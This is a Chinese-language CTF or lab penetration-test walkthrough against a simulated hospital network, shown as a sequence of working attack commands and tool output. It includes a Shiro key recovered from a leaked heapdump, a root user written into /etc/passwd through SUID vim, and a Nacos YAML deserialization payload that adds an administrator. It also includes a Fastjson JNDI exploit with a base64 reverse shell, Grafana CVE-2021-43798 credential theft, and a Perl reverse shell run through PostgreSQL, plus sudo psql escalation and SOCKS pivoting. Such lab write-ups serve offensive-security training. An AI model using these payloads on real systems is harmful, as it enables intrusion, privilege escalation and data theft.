外网#
信息收集#
❯ ./fscan -h 39.99.227.240
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-04-17 23:18:43] [INFO] 暴力破解线程数: 1
[2025-04-17 23:18:43] [INFO] 开始信息扫描
[2025-04-17 23:18:43] [INFO] 最终有效主机数量: 1
[2025-04-17 23:18:43] [INFO] 开始主机扫描
[2025-04-17 23:18:43] [INFO] 有效端口数量: 233
[2025-04-17 23:18:43] [SUCCESS] 端口开放 39.99.227.240:22
[2025-04-17 23:18:43] [SUCCESS] 服务识别 39.99.227.240:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-17 23:18:43] [SUCCESS] 端口开放 39.99.227.240:8080
[2025-04-17 23:18:49] [SUCCESS] 服务识别 39.99.227.240:8080 => [http]
[2025-04-17 23:18:49] [INFO] 存活端口数量: 2
[2025-04-17 23:18:49] [INFO] 开始漏洞扫描
[2025-04-17 23:18:49] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-04-17 23:18:49] [SUCCESS] 网站标题 http://39.99.227.240:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://39.99.227.240:8080/login;jsessionid=A315BAAC49DBECD9223E0BD9C6FB94DB
[2025-04-17 23:18:50] [SUCCESS] 网站标题 http://39.99.227.240:8080/login;jsessionid=A315BAAC49DBECD9223E0BD9C6FB94DB 状态码:200 长度:2005 标题:医疗管理后台
[2025-04-17 23:18:52] [SUCCESS] 目标: http://39.99.227.240:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-04-17 23:18:57] [SUCCESS] 扫描已完成: 3/3扫到8080端口的网站和dump泄漏,dirsearch扫目录发现/actuator/heapdump
python3 dirsearch.py -u http://39.99.227.240:8080Shiro反序列化#
利用JDump工具分析拿到key,猜测是Shiro
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump > 1.txtkey = GAYysgMQhG7/CzIJlVpR2g==抓包果然发现特征,经典组合拳
直接用工具一把梭,注入内存马
这里尝试PHP马连不上,Jsp马可以
蚁剑连接
SUID提权#
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device参考gtfobins ↗,可以利用vim.basic写公钥(或写passwd,sudoer)
故先升级交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm-256colorvim.basic /etc/passwd
:wq!写/etc/passwd
openssl passwd -1 -salt 123 123456
hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bashflag1#
ssh连接,拿下web1主机
ssh [email protected]
一层内网#
信息收集#
老规矩先上fscan收集信息
root@web01:/home/app# ./fscan_linux -h 172.30.12.5/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-04-18 00:07:09] [INFO] 暴力破解线程数: 1
[2025-04-18 00:07:09] [INFO] 开始信息扫描
[2025-04-18 00:07:10] [INFO] CIDR范围: 172.30.12.0-172.30.12.255
[2025-04-18 00:07:10] [INFO] 生成IP范围: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2025-04-18 00:07:10] [INFO] 解析CIDR 172.30.12.5/24 -> IP范围 172.30.12.0-172.30.12.255
[2025-04-18 00:07:10] [INFO] 最终有效主机数量: 256
[2025-04-18 00:07:10] [INFO] 开始主机扫描
[2025-04-18 00:07:10] [SUCCESS] 目标 172.30.12.5 存活 (ICMP)
[2025-04-18 00:07:10] [SUCCESS] 目标 172.30.12.6 存活 (ICMP)
[2025-04-18 00:07:10] [SUCCESS] 目标 172.30.12.236 存活 (ICMP)
[2025-04-18 00:07:13] [INFO] 存活主机数量: 3
[2025-04-18 00:07:13] [INFO] 有效端口数量: 233
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.6:445
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.6:139
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.6:135
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.236:22
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.5:22
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.236:8009
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.5:8080
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.236:8080
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.6:8848
[2025-04-18 00:07:13] [SUCCESS] 服务识别 172.30.12.236:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-18 00:07:13] [SUCCESS] 服务识别 172.30.12.5:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-18 00:07:18] [SUCCESS] 服务识别 172.30.12.6:445 =>
[2025-04-18 00:07:18] [SUCCESS] 服务识别 172.30.12.6:139 => Banner:[.]
[2025-04-18 00:07:18] [SUCCESS] 服务识别 172.30.12.236:8009 =>
[2025-04-18 00:07:18] [SUCCESS] 服务识别 172.30.12.5:8080 => [http]
[2025-04-18 00:07:19] [SUCCESS] 服务识别 172.30.12.236:8080 => [http]
[2025-04-18 00:07:24] [SUCCESS] 服务识别 172.30.12.6:8848 => [http]
[2025-04-18 00:08:18] [SUCCESS] 服务识别 172.30.12.6:135 =>
[2025-04-18 00:08:18] [INFO] 存活端口数量: 9
[2025-04-18 00:08:18] [INFO] 开始漏洞扫描
[2025-04-18 00:08:18] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-18 00:08:18] [SUCCESS] NetInfo 扫描结果
目标主机: 172.30.12.6
主机名: Server02
发现的网络接口:
IPv4地址:
└─ 172.30.12.6
[2025-04-18 00:08:18] [SUCCESS] NetBios 172.30.12.6 WORKGROUP\SERVER02
[2025-04-18 00:08:18] [SUCCESS] 网站标题 http://172.30.12.5:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=1ACFB6A4E51D284ABDFA37E0E80326B9
[2025-04-18 00:08:18] [SUCCESS] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964 标题:医院后台管理平台
[2025-04-18 00:08:18] [SUCCESS] 网站标题 http://172.30.12.5:8080/login;jsessionid=1ACFB6A4E51D284ABDFA37E0E80326B9 状态码:200 长度:2005 标题:医疗管理后台
[2025-04-18 00:08:19] [SUCCESS] 网站标题 http://172.30.12.6:8848 状态码:404 长度:431 标题:HTTP Status 404 – Not Found
[2025-04-18 00:08:20] [SUCCESS] 目标: http://172.30.12.5:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-04-18 00:08:20] [SUCCESS] 目标: http://172.30.12.6:8848
漏洞类型: poc-yaml-alibaba-nacos
漏洞名称:
详细信息:
author:AgeloVito
links:https://blog.csdn.net/caiqiiqi/article/details/112005424
[2025-04-18 00:08:21] [SUCCESS] 目标: http://172.30.12.6:8848
漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
漏洞名称:
详细信息:
author:kmahyyg(https://github.com/kmahyyg)
links:https://github.com/alibaba/nacos/issues/4593扫到两台资产
172.30.12.6:8848端口开启Nacos服务,yaml反序列化漏洞
172.30.12.236:8080端口有web服务,按题目提示猜测为fastjson
一级代理#
./agent_linux_x64 -lport 8888❯ ./admin_macos_x64 -rhost 39.99.227.240 -rport 8888 ─
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1
node 1
(node 1) >>> socks 9999
a socks5 proxy of the target node has started up on the local port 9999.
172.30.12.6 - flag2#
弱密码nacos:nacos进入后台读取Nacos配置
server:
port: 8080
servlet:
context-path: /hello
spring:
application:
name: db-config
cloud:
nacos:
discovery:
server-addr: 127.0.0.1:8848
config:
server-addr: 127.0.0.1:8848
file-extension: yaml
namespace: dev
group: DEFAULT_GROUP
data-id: db-config.yaml
datasource:
mysql:
url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
username: root
password: P@ssWord!!!
redis:
host: localhost
port: 6379
management:
endpoints:
web:
exposure:
include: '*'
利用Nacos利用工具检测发现yaml反序列化漏洞
因为是Win主机修改payload为添加新管理员用户
public AwesomeScriptEngineFactory() {
try {
Runtime.getRuntime().exec("net user baoyf passwd1234 /add");
Runtime.getRuntime().exec("net localgroup administrators baoyf /add");
} catch (IOException e) {
e.printStackTrace();
}
}编译,打包
要使用java1.8编译,卡了好久
主机不出网,将恶意jar包传到web1主机,开启web服务,让靶机访问
python3 -m http.server 1234
收到请求,证实漏洞存在,RDP上去,在管理员目录下找到flag2
172.30.12.236 - flag3#
再看下另一台,用Yakit插件扫到RCE漏洞
接下来就是复现,在Web1开启JNDI,不出网所以将shell反弹到Web1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMzAuMTIuNS81MDAwIDA+JjE=}|{base64, -d} | {bash,-i]" -A "172.30.12.5"
{
"name": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"x": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://172.30.12.5:1099/qt6t66",
"autoCommit": true
}
}nc -lvnp 5000拿下Web3主机
二层内网#
信息收集#
修改Web3 root密码便于下一步利用
没有机器了,但还差一个flag,ip a发现双网卡,传fscan进一步扫描内网
passwd
ssh [email protected]
wget http://172.30.12.5:1234/fscan_linux
wget http://172.30.12.5:1234/agent_linux_x64root@web03:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:28:b3:f3 brd ff:ff:ff:ff:ff:ff
inet 172.30.12.236/16 brd 172.30.255.255 scope global dynamic eth0
valid_lft 315352567sec preferred_lft 315352567sec
inet6 fe80::216:3eff:fe28:b3f3/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:28:b3:cb brd ff:ff:ff:ff:ff:ff
inet 172.30.54.179/24 brd 172.30.54.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe28:b3cb/64 scope link
valid_lft forever preferred_lft forever扫172.30.54.179/24网段
root@web03:~# ./fscan_linux -h 172.30.54.179/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-04-18 01:22:38] [INFO] 暴力破解线程数: 1
[2025-04-18 01:22:38] [INFO] 开始信息扫描
[2025-04-18 01:22:38] [INFO] CIDR范围: 172.30.54.0-172.30.54.255
[2025-04-18 01:22:39] [INFO] 生成IP范围: 172.30.54.0.%!d(string=172.30.54.255) - %!s(MISSING).%!d(MISSING)
[2025-04-18 01:22:39] [INFO] 解析CIDR 172.30.54.179/24 -> IP范围 172.30.54.0-172.30.54.255
[2025-04-18 01:22:39] [INFO] 最终有效主机数量: 256
[2025-04-18 01:22:39] [INFO] 开始主机扫描
[2025-04-18 01:22:39] [SUCCESS] 目标 172.30.54.179 存活 (ICMP)
[2025-04-18 01:22:39] [SUCCESS] 目标 172.30.54.12 存活 (ICMP)
[2025-04-18 01:22:42] [INFO] 存活主机数量: 2
[2025-04-18 01:22:42] [INFO] 有效端口数量: 233
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.179:22
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.12:22
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.12:5432
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.12:3000
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.179:8009
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.179:8080
[2025-04-18 01:22:42] [SUCCESS] 服务识别 172.30.54.179:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-18 01:22:42] [SUCCESS] 服务识别 172.30.54.12:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-18 01:22:47] [SUCCESS] 服务识别 172.30.54.12:5432 =>
[2025-04-18 01:22:47] [SUCCESS] 服务识别 172.30.54.12:3000 => [http] Banner:[HTTP/1.1 400 Bad Request.Content-Type: text/plain; charset=utf-8.Connection: close.400 Bad Request]
[2025-04-18 01:22:47] [SUCCESS] 服务识别 172.30.54.179:8009 =>
[2025-04-18 01:22:47] [SUCCESS] 服务识别 172.30.54.179:8080 => [http]
[2025-04-18 01:22:47] [INFO] 存活端口数量: 6
[2025-04-18 01:22:47] [INFO] 开始漏洞扫描
[2025-04-18 01:22:48] [INFO] 加载的插件: postgres, ssh, webpoc, webtitle
[2025-04-18 01:22:48] [SUCCESS] 网站标题 http://172.30.54.179:8080 状态码:200 长度:3964 标题:医院后台管理平台
[2025-04-18 01:22:48] [SUCCESS] 网站标题 http://172.30.54.12:3000 状态码:302 长度:29 标题:无标题 重定向地址: http://172.30.54.12:3000/login
[2025-04-18 01:22:48] [SUCCESS] 网站标题 http://172.30.54.12:3000/login 状态码:200 长度:27909 标题:Grafana发现资产172.30.54.12
开启服务Grafana(3000端口)+PostgreSQL(5431端口)
二级代理#
(node 1) >>> show
A
+ -- 1
(node 1) >>> listen 9998
listen 9998
the port 9998 is successfully listening on the remote node!
(node 1) >>> show
A
+ -- 1
+ -- 2
(node 1) >>> goto 2
node 2
(node 2) >>> socks 9998
a socks5 proxy of the target node has started up on the local port 9998.root@web03:~# ./agent_linux_x64 -rhost 172.30.12.5 -rport 9998
2025/04/18 01:27:05 [+]Successfully connects to a new node
172.30.54.12 - flag4#
Grafana存在CVE-2021-43798,利用GrafanaExp ↗,拿到数据库密码
./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
type:[postgres] name:[PostgreSQL] url:[localhost:5432] user:[postgres] password[Postgres@123]搭建了代理,在本地连接SQL 可以修改root用户密码,psql也可以创建函数执行命令,缺点是没回显
不出网向Web3反弹shell,bash无法使用,可以用perl
psql -h 172.30.54.12 -U postgres -W
# 反弹shell
select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
# 修改数据库admin密码
ALTER USER root WITH PASSWORD '123456';sudo提权
postgres@web04:/usr/local/pgsql/data$ sudo -l
Matching Defaults entries for postgres on web04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on web04:
(ALL) NOPASSWD: /usr/local/postgresql/bin/psqlsudo /usr/local/postgresql/bin/psql
\?
!/bin/bash